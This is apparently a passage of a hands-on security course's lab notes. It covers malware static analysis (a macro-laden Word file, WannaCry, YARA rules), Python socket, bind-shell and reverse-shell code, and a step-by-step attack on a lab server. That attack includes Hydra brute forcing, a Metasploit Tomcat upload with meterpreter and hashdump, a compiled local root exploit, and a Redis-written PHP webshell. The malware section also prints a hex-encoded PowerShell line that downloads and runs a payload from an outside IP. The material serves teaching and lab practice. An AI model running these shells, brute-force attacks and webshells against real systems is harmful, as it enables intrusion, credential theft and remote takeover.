3365############################
3366# Download the Analysis VM #
3367############################
3368https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
3369user: infosecaddicts
3370pass: infosecaddicts
3371
3372
3373
3374- Log in to your Ubuntu system with the username 'infosecaddicts' and the password 'infosecaddicts'.
3375
3376
3377
3378
3379
3380
3381################
3382# The Scenario #
3383################
3384You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
3385
3386
3387The fastest thing you can do is perform static analysis.
3388
3389---------------------------Type This-----------------------------------
3390
3391sudo pip install olefile
3392 strategicsec
3393
3394mkdir ~/Desktop/oledump
3395
3396cd ~/Desktop/oledump
3397
3398wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
3399
3400unzip oledump_V0_0_22.zip
3401
3402wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
3403
3404unzip 064016.zip
3405 infected
3406
3407python oledump.py 064016.doc
3408
3409python oledump.py 064016.doc -s A4 -v
3410
3411- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
3412- Three of the data streams are flagged as macros: A3:'VBA/Module1′, A4:'VBA/Module2′, A5:'VBA/ThisDocument'.
3413
3414
3415python oledump.py 064016.doc -s A5 -v
3416
3417- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
3418
3419
3420python oledump.py 064016.doc -s A3 -v
3421-----------------------------------------------------------------------
3422
3423- Look for "GVhkjbjv" and you should see:
3424
3425636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
3426
3427- Take that long blob that starts with 636D and finishes with 653B and paste it in:
3428http://www.rapidtables.com/convert/number/hex-to-ascii.htm
3429
3430
3431
3432###################
3433# Static Analysis #
3434###################
3435
3436- After logging please open a terminal window and type the following commands:
3437
3438---------------------------Type This-----------------------------------
3439
3440cd Desktop/
3441
3442wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
3443
3444unzip wannacry.zip
3445 infected
3446
3447file wannacry.exe
3448
3449mv wannacry.exe malware.pdf
3450
3451file malware.pdf
3452
3453mv malware.pdf wannacry.exe
3454
3455hexdump -n 2 -C wannacry.exe
3456-----------------------------------------------------------------------
3457
3458
3459
3460
3461***What is '4d 5a' or 'MZ'***
3462Reference:
3463http://www.garykessler.net/library/file_sigs.html
3464
3465
3466
3467---------------------------Type This-----------------------------------
3468
3469
3470objdump -x wannacry.exe
3471
3472strings wannacry.exe
3473
3474strings --all wannacry.exe | head -n 6
3475
3476strings wannacry.exe | grep -i dll
3477
3478strings wannacry.exe | grep -i library
3479
3480strings wannacry.exe | grep -i reg
3481
3482strings wannacry.exe | grep -i key
3483
3484strings wannacry.exe | grep -i rsa
3485
3486strings wannacry.exe | grep -i open
3487
3488strings wannacry.exe | grep -i get
3489
3490strings wannacry.exe | grep -i mutex
3491
3492strings wannacry.exe | grep -i irc
3493
3494strings wannacry.exe | grep -i join
3495
3496strings wannacry.exe | grep -i admin
3497
3498strings wannacry.exe | grep -i list
3499
3500-----------------------------------------------------------------------
3501
3502
3503
3504
3505
3506
3507
3508
3509
3510
3511Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
3512
3513Quick Google search for "wannacry ransomeware analysis"
3514
3515
3516Reference
3517https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
3518
3519- Yara Rule -
3520
3521
3522Strings:
3523$s1 = "Ooops, your files have been encrypted!" wide ascii nocase
3524$s2 = "Wanna Decryptor" wide ascii nocase
3525$s3 = ".wcry" wide ascii nocase
3526$s4 = "WANNACRY" wide ascii nocase
3527$s5 = "WANACRY!" wide ascii nocase
3528$s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
3529
3530
3531
3532
3533
3534
3535
3536
3537Ok, let's look for the individual strings
3538
3539---------------------------Type This-----------------------------------
3540
3541
3542strings wannacry.exe | grep -i ooops
3543
3544strings wannacry.exe | grep -i wanna
3545
3546strings wannacry.exe | grep -i wcry
3547
3548strings wannacry.exe | grep -i wannacry
3549
3550strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
3551
3552-----------------------------------------------------------------------
3553
3554
3555
3556
3557
3558
3559####################################
3560# Tired of GREP - let's try Python #
3561####################################
3562Decided to make my own script for this kind of stuff in the future. I
3563
3564Reference1:
3565https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
3566
3567This is a really good script for the basics of static analysis
3568
3569Reference:
3570https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
3571
3572
3573This is really good for showing some good signatures to add to the Python script
3574
3575
3576Here is my own script using the signatures (started this yesterday, but still needs work):
3577https://pastebin.com/guxzCBmP
3578
3579
3580---------------------------Type This-----------------------------------
3581
3582
3583sudo apt install -y python-pefile
3584 strategicsec
3585
3586
3587
3588wget https://pastebin.com/raw/guxzCBmP
3589
3590
3591mv guxzCBmP am.py
3592
3593
3594vi am.py
3595
3596python am.py wannacry.exe
3597
3598-----------------------------------------------------------------------
3599
3600
3601
3602
3603
3604
3605
3606
3607
3608##############
3609# Yara Ninja #
3610##############
3611
3612---------------------------Type This-----------------------------------
3613
3614cd ~/Desktop
3615
3616sudo apt-get remove -y yara
3617 infosecaddcits
3618
3619sudo apt -y install libtool
3620 strategicsec
3621
3622wget https://github.com/VirusTotal/yara/archive/v3.6.0.zip
3623
3624
3625unzip v3.6.0.zip
3626
3627cd yara-3.6.0
3628
3629./bootstrap.sh
3630
3631./configure
3632
3633make
3634
3635sudo make install
3636 strategicsec
3637
3638yara -v
3639
3640cd ~/Desktop
3641-----------------------------------------------------------------------
3642
3643
3644
3645
3646NOTE:
3647McAfee is giving these yara rules - so add them to the hashes.txt file
3648
3649Reference:
3650https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
3651
3652----------------------------------------------------------------------------
3653rule wannacry_1 : ransom
3654{
3655 meta:
3656 author = "Joshua Cannell"
3657 description = "WannaCry Ransomware strings"
3658 weight = 100
3659 date = "2017-05-12"
3660
3661 strings:
3662 $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
3663 $s2 = "Wanna Decryptor" wide ascii nocase
3664 $s3 = ".wcry" wide ascii nocase
3665 $s4 = "WANNACRY" wide ascii nocase
3666 $s5 = "WANACRY!" wide ascii nocase
3667 $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
3668
3669 condition:
3670 any of them
3671}
3672
3673----------------------------------------------------------------------------
3674rule wannacry_2{
3675 meta:
3676 author = "Harold Ogden"
3677 description = "WannaCry Ransomware Strings"
3678 date = "2017-05-12"
3679 weight = 100
3680
3681 strings:
3682 $string1 = "msg/m_bulgarian.wnry"
3683 $string2 = "msg/m_chinese (simplified).wnry"
3684 $string3 = "msg/m_chinese (traditional).wnry"
3685 $string4 = "msg/m_croatian.wnry"
3686 $string5 = "msg/m_czech.wnry"
3687 $string6 = "msg/m_danish.wnry"
3688 $string7 = "msg/m_dutch.wnry"
3689 $string8 = "msg/m_english.wnry"
3690 $string9 = "msg/m_filipino.wnry"
3691 $string10 = "msg/m_finnish.wnry"
3692 $string11 = "msg/m_french.wnry"
3693 $string12 = "msg/m_german.wnry"
3694 $string13 = "msg/m_greek.wnry"
3695 $string14 = "msg/m_indonesian.wnry"
3696 $string15 = "msg/m_italian.wnry"
3697 $string16 = "msg/m_japanese.wnry"
3698 $string17 = "msg/m_korean.wnry"
3699 $string18 = "msg/m_latvian.wnry"
3700 $string19 = "msg/m_norwegian.wnry"
3701 $string20 = "msg/m_polish.wnry"
3702 $string21 = "msg/m_portuguese.wnry"
3703 $string22 = "msg/m_romanian.wnry"
3704 $string23 = "msg/m_russian.wnry"
3705 $string24 = "msg/m_slovak.wnry"
3706 $string25 = "msg/m_spanish.wnry"
3707 $string26 = "msg/m_swedish.wnry"
3708 $string27 = "msg/m_turkish.wnry"
3709 $string28 = "msg/m_vietnamese.wnry"
3710
3711
3712 condition:
3713 any of ($string*)
3714}
3715----------------------------------------------------------------------------
3716
3717
3718#######################
3719# External DB Lookups #
3720#######################
3721
3722Creating a malware database (sqlite)
3723
3724---------------------------Type This-----------------------------------
3725
3726sudo apt install -y python-simplejson python-simplejson-dbg
3727 strategicsec
3728
3729
3730
3731wget https://raw.githubusercontent.com/mboman/mart/master/bin/avsubmit.py
3732
3733
3734
3735python avsubmit.py -f wannacry.exe -e
3736
3737-----------------------------------------------------------------------
3738
3739Analysis of the file can be found at:
3740http://www.threatexpert.com/report.aspx?md5=84c82835a5d21bbcf75a61706d8ab549
3741
3742
3743
3744
3745
3746
3747
3748
3749
3750###############################
3751# Creating a Malware Database #
3752###############################
3753Creating a malware database (mysql)
3754-----------------------------------
3755- Step 1: Installing MySQL database
3756- Run the following command in the terminal:
3757
3758---------------------------Type This-----------------------------------
3759
3760sudo apt install -y mysql-server
3761 strategicsec
3762
3763- Step 2: Installing Python MySQLdb module
3764- Run the following command in the terminal:
3765
3766sudo apt-get build-dep python-mysqldb
3767 strategicsec
3768
3769sudo apt install -y python-mysqldb
3770 strategicsec
3771
3772- Step 3: Logging in
3773- Run the following command in the terminal:
3774
3775mysql -u root -p (set a password of 'malware')
3776
3777- Then create one database by running following command:
3778
3779create database malware;
3780
3781exit;
3782
3783wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
3784
3785vi mal_to_db.py (fill in database connection information)
3786
3787python mal_to_db.py -i
3788
3789------- check it to see if the files table was created ------
3790
3791mysql -u root -p
3792 malware
3793
3794show databases;
3795
3796use malware;
3797
3798show tables;
3799
3800describe files;
3801
3802exit;
3803
3804---------------------------------
3805
3806
3807- Now add the malicious file to the DB
3808
3809python mal_to_db.py -f wannacry.exe -u
3810
3811
3812
3813- Now check to see if it is in the DB
3814
3815mysql -u root -p
3816 malware
3817
3818mysql> use malware;
3819
3820select id,md5,sha1,sha256,time FROM files;
3821
3822mysql> quit;
3823
3824
3825--------------------------------------------------------------------------------------
3826$ sudo /sbin/iptables -F
3827
3828$ ncat -l -v -p 1234
3829
3830
3831
3832
3833--open another terminal--
3834python
3835
3836>>> import socket
3837>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
3838>>> s.connect(('localhost', 1234))
3839>>> s.send('Hello, world')
3840>>> data = s.recv(1024)
3841>>> s.close()
3842
3843>>> print 'Received', data
3844
3845
3846
3847
3848
3849
3850########################################
3851# Lesson 18: TCP Client and TCP Server #
3852########################################
3853
3854---------------------------Type This-----------------------------------
3855
3856vi tcpclient.py
3857
3858
3859---------------------------Paste This-----------------------------------
3860
3861#!/usr/bin/python
3862# tcpclient.py
3863
3864import socket
3865
3866s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
3867hostport = ("127.0.0.1", 1337)
3868s.connect(hostport)
3869s.send("Hello\n")
3870buf = s.recv(1024)
3871print "Received", buf
3872
3873
3874
3875
3876
3877
3878
3879
3880---------------------------Type This-----------------------------------
3881
3882vi tcpserver.py
3883
3884
3885
3886---------------------------Paste This-----------------------------------
3887
3888
3889#!/usr/bin/python
3890# tcpserver.py
3891
3892import socket
3893
3894s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
3895hostport = ("", 1337)
3896s.bind(hostport)
3897s.listen(10)
3898while 1:
3899 cli,addr = s.accept()
3900 print "Connection from", addr
3901 buf = cli.recv(1024)
3902 print "Received", buf
3903 if buf == "Hello\n":
3904 cli.send("Server ID 1\n")
3905 cli.close()
3906
3907
3908
3909
3910
3911
3912---------------------------Type This-----------------------------------
3913
3914
3915python tcpserver.py
3916
3917
3918--open another terminal--
3919python tcpclient.py
3920
3921
3922########################################
3923# Lesson 19: UDP Client and UDP Server #
3924########################################
3925
3926---------------------------Type This-----------------------------------
3927
3928vi udpclient.py
3929
3930
3931
3932
3933---------------------------Paste This-----------------------------------
3934
3935
3936#!/usr/bin/python
3937# udpclient.py
3938
3939import socket
3940
3941s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
3942hostport = ("127.0.0.1", 1337)
3943s.sendto("Hello\n", hostport)
3944buf = s.recv(1024)
3945print buf
3946
3947
3948
3949
3950
3951
3952
3953---------------------------Type This-----------------------------------
3954
3955
3956vi udpserver.py
3957
3958
3959
3960---------------------------Paste This-----------------------------------
3961
3962
3963
3964#!/usr/bin/python
3965# udpserver.py
3966
3967import socket
3968
3969s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
3970hostport = ("127.0.0.1", 1337)
3971s.bind(hostport)
3972while 1:
3973 buf, address = s.recvfrom(1024)
3974 print buf
3975 if buf == "Hello\n":
3976 s.sendto("Server ID 1\n", address)
3977
3978
3979
3980
3981---------------------------Type This-----------------------------------
3982
3983
3984python udpserver.py
3985
3986
3987--open another terminal--
3988python udpclient.py
3989
3990
3991
3992######################################
3993# Lesson 20: Bind and Reverse Shells #
3994######################################
3995
3996---------------------------Type This-----------------------------------
3997
3998vi simplebindshell.py
3999
4000---------------------------Paste This-----------------------------------
4001
4002#!/bin/python
4003import os,sys,socket
4004
4005ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
4006print '-Creating socket..'
4007port = 31337
4008try:
4009 ls.bind(('', port))
4010 print '-Binding the port on '
4011 ls.listen(1)
4012 print '-Listening, '
4013 (conn, addr) = ls.accept()
4014 print '-Waiting for connection...'
4015 cli= conn.fileno()
4016 print '-Redirecting shell...'
4017 os.dup2(cli, 0)
4018 print 'In, '
4019 os.dup2(cli, 1)
4020 print 'Out, '
4021 os.dup2(cli, 2)
4022 print 'Err'
4023 print 'Done!'
4024 arg0='/bin/sh'
4025 arg1='-a'
4026 args=[arg0]+[arg1]
4027 os.execv(arg0, args)
4028except(socket.error):
4029 print 'fail\n'
4030 conn.close()
4031 sys.exit(1)
4032
4033
4034
4035
4036
4037
4038---------------------------Type This-----------------------------------
4039
4040nc TARGETIP 31337
4041
4042
4043
4044---------------------
4045- Preparing the target for a reverse shell
4046$ ncat -lvp 4444
4047
4048
4049
4050--open another terminal--
4051wget https://www.trustedsec.com/files/simple_py_shell.py
4052
4053vi simple_py_shell.py
4054
4055
4056
4057
4058
4059
4060-------------------------------
4061Tricky shells
4062
4063Reference:
4064http://securityweekly.com/2011/10/python-one-line-shell-code.html
4065http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
4066
4067
4068
4069--------------------------------------------------------------------------------------------------------------
4070
4071
4072# Reverse Shell in Python 2.7 #
4073###############################
4074
4075We'll create 2 python files. One for the server and one for the client.
4076
4077- Below is the python code that is running on victim/client Windows machine:
4078
4079---------------------------------------------------------------------
4080
4081# Client
4082
4083import socket # For Building TCP Connection
4084import subprocess # To start the shell in the system
4085
4086def connect():
4087 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
4088 s.connect(('192.168.243.150',8080))
4089
4090 while True: #keep receiving commands
4091 command = s.recv(1024)
4092
4093 if 'terminate' in command:
4094 s.close() #close the socket
4095 break
4096
4097 else:
4098
4099 CMD = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
4100 s.send( CMD.stdout.read() ) # send the result
4101 s.send( CMD.stderr.read() ) # incase you mistyped a command.
4102 # we will send back the error
4103
4104def main ():
4105 connect()
4106main()
4107
4108
4109----------------------------------------------------------------------------------------------------------------
4110
4111- Below is the code that we should run on server unit, in our case strategicsec Ubuntu machine ( Ubuntu IP: 192.168.243.150 )
4112
4113---------------------------------------------------------------------------
4114
4115# Server
4116
4117import socket # For Building TCP Connection
4118
4119
4120def connect ():
4121
4122 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
4123 s.bind(("192.168.243.150", 8080))
4124 s.listen(1)
4125 conn, addr = s.accept()
4126 print '[+] We got a connection from: ', addr
4127
4128
4129 while True:
4130 command = raw_input("Shell> ")
4131
4132 if 'terminate' in command:
4133 conn.send('termminate')
4134 conn.cloe() # close the connection with host
4135 break
4136
4137 else:
4138 conn.send(command) #send command
4139 print conn.recv(1024)
4140
4141def main ():
4142 connect()
4143main()
4144
4145--------------------------------------------------------------------------
4146
4147- First run server.py code from Ubuntu machine. From command line type:
4148
4149---------------------------Type This-----------------------------------
4150
4151python server.py
4152
4153
4154- then check if 8080 port is open, and if we are listening on 8080:
4155
4156
4157netstat -antp | grep "8080"
4158
4159
4160--------------------------
4161
4162- Then on victim ( Windows ) unit run client.py code.
4163
4164
4165- Connection will be established, and you will get a shell on Ubuntu:
4166
4167infosecaddicts@ubuntu:~$ python server.py
4168[+] We got a connection from: ('192.168.243.1', 56880)
4169Shell> arp -a
4170
4171Shell> ipconfig
4172
4173Shell> dir
4174-------------------------------------------------------------------------------------------------------------------------
4175
4176
4177So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
4178https://s3.amazonaws.com/infosecaddictsfiles/InfoSecAddicts-VPN-2018-Info.pdf
4179user: userX (user1, user2, user3, user4, user5, user6)
4180pass: --------
4181
4182
4183
4184
4185
4186
4187
4188
4189
4190#########################
4191# Building a quick list #
4192#########################
4193
4194---------------------------Type This-----------------------------------
4195
4196cd ~
4197echo bob >> list.txt
4198echo jim >> list.txt
4199echo joe >> list.txt
4200echo tim >> list.txt
4201echo admin >> list.txt
4202echo hello >> list.txt
4203echo rob >> list.txt
4204echo test >> list.txt
4205echo aaaaaa >> list.txt
4206echo larry >> list.txt
4207echo mario >> list.txt
4208echo jason >> list.txt
4209echo john >> list.txt
4210
4211-----------------------------------------------------------------------
4212
4213
4214
4215Attack steps:
4216-------------
4217
4218
4219Step 1: Ping sweep the target network
4220-------------------------------------
4221
4222
4223---------------------------Type This-----------------------------------
4224nmap -sP 172.31.2.0/24
4225-----------------------------------------------------------------------
4226
4227Found 5 hosts:
4228172.31.2.24
4229172.31.2.64
4230172.31.2.117
4231172.31.2.217
4232172.31.2.238
4233
4234Step 2: Port scan target system
4235-------------------------------
4236
4237
4238---------------------------Type This-----------------------------------
4239sudo nmap -sV 172.31.2.24
4240-----------------------------------------------------------------------
4241
4242
4243
4244
4245
4246
4247Step 3: Vulnerability Scan the webserver
4248----------------------------------------
4249
4250
4251---------------------------Type This-----------------------------------
4252cd ~/toolz/
4253
4254rm -rf nikto*
4255
4256git clone https://github.com/sullo/nikto.git Nikto2
4257
4258cd Nikto2/program
4259
4260perl nikto.pl -h 172.31.2.24
4261-----------------------------------------------------------------------
4262
4263
4264
4265
4266
4267Step 4: Run dirbuster or similar directory bruteforce tool against the target
4268-----------------------------------------------------------------------------
4269
4270
4271---------------------------Type This-----------------------------------
4272wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
4273
4274perl Webr00t.pl -h 172.31.2.24 -v | grep -v "404 Not Found"
4275-----------------------------------------------------------------------
4276
4277
4278
4279
4280Step 5: Browse the web site to look for clues
4281---------------------------------------------
4282Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
4283
4284
4285
4286###############
4287# Using Nikto #
4288###############
4289
4290---------------------------Type This-----------------------------------
4291
4292cd ~/toolz/
4293
4294rm -rf nikto*
4295
4296git clone https://github.com/sullo/nikto.git Nikto2
4297
4298cd Nikto2/program
4299
4300perl nikto.pl -h 172.31.2.24
4301
4302perl nikto.pl -h 172.31.2.24:8080
4303
4304perl nikto.pl -h 172.31.2.24:8081
4305
4306perl nikto.pl -h 172.31.2.24:9000
4307-----------------------------------------------------------------------
4308
4309
4310
4311
4312####################
4313# Using Metasploit #
4314####################
4315
4316---------------------------Type This-----------------------------------
4317
4318cd ~/toolz/metasploit
4319
4320./msfconsole
4321
4322use auxiliary/scanner/http/http_version
4323
4324set RHOSTS 172.31.2.24
4325
4326set RPORT 8080
4327
4328run
4329
4330
4331-------------------------------
4332
4333use auxiliary/scanner/http/tomcat_enum
4334
4335set RHOSTS 172.31.2.24
4336
4337set RPORT 8080
4338
4339run
4340
4341
4342
4343
4344
4345####################
4346# Attacking Tomcat #
4347####################
4348
4349---------------------------Type This-----------------------------------
4350
4351use auxiliary/scanner/http/http_version
4352
4353set RHOSTS 172.31.2.24
4354
4355set RPORT 8080
4356
4357run
4358
4359
4360-------------------------------
4361
4362
4363use auxiliary/scanner/http/tomcat_mgr_login
4364
4365set USERNAME tomcat
4366
4367set USERPASS_FILE /home/strategicsec/list.txt
4368
4369set STOP_ON_SUCCESS true
4370
4371set RHOSTS 172.31.2.24
4372
4373set RPORT 8080
4374
4375run
4376
4377
4378-------------------------------
4379
4380use exploit/multi/http/tomcat_mgr_upload
4381
4382set HttpUsername tomcat
4383
4384set HttpPassword tomcat
4385
4386set RHOST 172.31.2.24
4387
4388set RPORT 8080
4389
4390set PATH /manager/html
4391
4392set PAYLOAD linux/x86/meterpreter/bind_tcp
4393
4394exploit
4395
4396
4397run post/linux/gather/checkvm
4398
4399run post/linux/gather/enum_configs
4400
4401run post/linux/gather/enum_protections
4402
4403run post/linux/gather/enum_system
4404
4405run post/linux/gather/enum_users_history
4406
4407run post/linux/gather/hashdump
4408
4409shell
4410
4411/bin/bash
4412
4413id
4414
4415uname -a
4416
4417dpkg -l
4418
4419cd /tmp
4420
4421pwd
4422
4423
4424cat >> exploit.c << out
4425
4426**************paste in the content from here *****************
4427https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c
4428
4429
4430------ hit enter a few times ------
4431
4432------ then type 'out' ----- this closes the file handle...
4433
4434
4435gcc -o boom exploit.c
4436
4437./boom
4438
4439id
4440
4441
4442-------------------------------
4443
4444
4445hydra -l tomcat -P /home/strategicsec/list.txt -e ns -s 8080 -vV 172.31.2.24 http-get /manager/html
4446
4447
4448#################
4449# Attacking FTP #
4450#################
4451
4452---------------------------Type This-----------------------------------
4453
4454sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.24
4455
4456cd ~/toolz/hydra
4457
4458hydra -l admin -P /home/strategicsec/list.txt -u -s 25 172.31.2.24 ftp
4459
4460ftp
4461open 172.31.2.24
4462admin
4463admin
4464pwd
4465ls -lah
4466
4467ls ../../
4468
4469
4470#################
4471# Attacking SSH #
4472#################
4473
4474---------------------------Type This-----------------------------------
4475
4476cd ~/toolz/hydra
4477
4478hydra -L /home/strategicsec/list.txt -P /home/strategicsec/list.txt -u -s 1322 172.31.2.24 ssh
4479
4480ssh -p 1322 admin@172.31.2.24
4481
4482
4483
4484
4485cd ~/toolz/metasploit
4486
4487./msfconsole
4488
4489use auxiliary/scanner/ssh/ssh_users
4490
4491set USER_FILE /home/strategicsec/list.txt
4492
4493set STOP_ON_SUCCESS true
4494
4495set RHOSTS 172.31.2.24
4496
4497set RPORT 1322
4498
4499run
4500
4501
4502
4503
4504
4505use auxiliary/scanner/ssh/ssh_login
4506
4507set USER_FILE /home/strategicsec/list.txt
4508
4509set PASS_FILE /home/strategicsec/list.txt
4510
4511set STOP_ON_SUCCESS true
4512
4513set RHOSTS 172.31.2.24
4514
4515set RPORT 1322
4516
4517run
4518
4519
4520sessions -l
4521
4522sessions -u 1
4523
4524sessions -i 1
4525
4526id
4527
4528
4529
4530########################
4531# Attacking phpMyAdmin #
4532########################
4533****** This section isn't finished ******
4534
4535---------------------------Type This-----------------------------------
4536
4537hydra -l root -P /home/strategicsec/list.txt -e n http-post-form://172.31.2.24 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"
4538-----------------------------------------------------------------------
4539
4540****** This section isn't finished ******
4541
4542Google is your friend hahahahahahahah........
4543
4544---------------------------Type This-----------------------------------
4545
4546cd ~
4547
4548wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py
4549
4550python pmabf.py http://172.31.2.24 root list.txt (this gave me the WRONG password)
4551
4552-----------------------------------------------------------------------
4553
4554
4555
4556
4557
4558####################
4559# Attacking Joomla #
4560####################
4561
4562---------------------------Type This-----------------------------------
4563
4564cd ~/toolz/metasploit
4565
4566./msfconsole
4567
4568use use auxiliary/scanner/http/joomla_plugins
4569
4570set RHOSTS 172.31.2.24
4571
4572set RPORT 8080
4573
4574run
4575
4576
4577****** This section isn't finished ******
4578Google is your friend hahahahahahahah........
4579
4580#####################
4581# Attacking Jenkins #
4582#####################
4583
4584
4585****** This section isn't finished ******
4586Google is your friend hahahahahahahah........
4587
4588#################
4589# Attacking NFS #
4590#################
4591
4592---------------------------Type This-----------------------------------
4593
4594sudo apt install -y rpcbind nfs-common
4595 strategicsec
4596
4597rpcinfo -s 172.31.2.24
4598
4599showmount -e 172.31.2.24
4600
4601sudo /bin/bash
4602
4603mkdir /tmp/nfs
4604
4605mount -t nfs 172.31.2.24:/backup /tmp/nfs -o nolock
4606
4607ls /tmp/nfs
4608
4609cp /tmp/nfs/backup.tar.bz2.zip /home/strategicsec
4610
4611umount -l /tmp/nfs
4612
4613exit
4614
4615sudo apt-cache search fcrackzip
4616
4617sudo apt-get install -y fcrackzip
4618
4619fcrackzip -u backup.tar.bz2.zip
4620
4621unzip -P aaaaaa backup.tar.bz2.zip
4622
4623tar jxf backup.tar.bz2
4624
4625
4626###################
4627# Attacking Redis #
4628###################
4629
4630---------------------------Type This-----------------------------------
4631
4632sudo nmap -p 6379 --script=redis-info 172.31.2.24
4633 strategicsec
4634
4635sudo apt-get install -y redis-tools
4636
4637
4638redis-cli -h 172.31.2.24
4639
4640CONFIG SET dir /var/www/html/main
4641
4642CONFIG GET dir
4643
4644config set dbfilename boom.php
4645
4646CONFIG GET dbfilename
4647
4648SET cmd "<?php system($_GET['joe']); ?>"
4649
4650BGSAVE
4651
4652http://172.31.2.24/boom.php
4653
4654http://172.31.2.24/boom.php?joe=id
4655
4656
4657(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh"
4658
4659
4660
4661****** This section isn't finished ******
4662Google is your friend hahahahahahahah........
4663
4664cd ~/toolz/metasploit
4665
4666./msfconsole
4667
4668use auxiliary/scanner/redis/file_upload
4669
4670set RHOSTS 172.31.2.24
4671
4672set LocalFile
4673
4674****** This section isn't finished ******
4675
4676
4677
4678#######################
4679# VMs for this course #
4680#######################
4681https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
4682 username: workshop
4683 password: password
4684
4685https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
4686user: infosecaddicts
4687pass: infosecaddicts
4688
4689You don't have to, but you can do the updates in the Win7 VM (yes, it is a lot of updates).
4690
4691You'll need to create directory in the Win7 VM called "c:\ps"
4692
4693In this file you will also need to change the text '192.168.150.129' to the IP address of your Ubuntu host.
4694
4695
4696
4697########################################
4698# Basic Network Commands in PowerShell #
4699########################################
4700
4701Reference:
4702https://blogs.technet.microsoft.com/josebda/2015/04/18/windows-powershell-equivalents-for-common-networking-commands-ipconfig-ping-nslookup/
4703
4704
4705###################
4706# Pentester Tasks #
4707###################
4708Reference:
4709http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
4710
4711
4712Listing IPs
4713-----------
4714One of the typical ways for working with IP addressed in most scripts is to work with an octet and then increase the last one
4715
4716------------------------Type This------------------------------
4717$octect = "192.168.150."
4718$lastoctect = (1..255)
4719$lastoctect | ForEach-Object {write-host "$($octect)$($_)"}
4720---------------------------------------------------------------
4721
4722
4723Ping Sweep
4724------------------------------------------------------
4725PowerShell provides several methods for doing Ping
4726Test-Connection cmdlet
4727Creation of a WMI Object
4728.Net System.Net.NetworkInformation.Ping Object
4729------------------------------------------------------
4730
4731
4732------------------------Type This------------------------------
4733function New-IPRange ($start, $end) {
4734$ip1 = ([System.Net.IPAddress]$start).GetAddressBytes()
4735[Array]::Reverse($ip1)
4736$ip1 = ([System.Net.IPAddress]($ip1 -join '.')).Address
4737
4738$ip2 = ([System.Net.IPAddress]$end).GetAddressBytes()
4739[Array]::Reverse($ip2)
4740$ip2 = ([System.Net.IPAddress]($ip2 -join '.')).Address
4741
4742for ($x=$ip1; $x -le $ip2; $x++) {
4743$ip = ([System.Net.IPAddress]$x).GetAddressBytes()
4744[Array]::Reverse($ip)
4745$ip -join '.'
4746}
4747}
4748$ping = New-Object System.Net.NetworkInformation.Ping
4749New-IPRange 192.168.150.1 192.168.150.150 | ForEach-Object {$ping.Send($_, 100)} | where {$_.status -eq "Success"}
4750---------------------------------------------------------------
4751
4752
4753Reverse Lookups
4754---------------
4755For reverse lookups using .Net Class we use the [System.Net.Dns]::GetHostEntry(IP) method Returns System.Net.IPHostEntry
4756
4757
4758
4759Forward Lookups
4760---------------
4761
4762------------------------Type This------------------------------
4763[System.Net.Dns]::GetHostAddresses("www.google.com")
4764---------------------------------------------------------------
4765
4766
4767Port Scans
4768----------
4769To test if a port is open on a remote host in PowerShell the best method is to use the .Net abstraction that it provides to Windows Socket library
4770For TCP the .Net System.Net.Sockets.TcpClient
4771For UDP the .Net System.Net.Sockets.UdpClient
4772
4773
4774
4775
4776TCP Scan
4777--------
4778
4779------------------------Type This------------------------------
4780$ports=22,80,443,3389
4781$target = "192.168.150.129"
4782foreach ($i in $ports) {
4783try {
4784$socket = new-object System.Net.Sockets.TCPClient($target, $i);
4785} catch {}
4786if ($socket -eq $NULL) {
4787echo "$target:$i - Closed";
4788} else {
4789echo "$target:$i - Open";
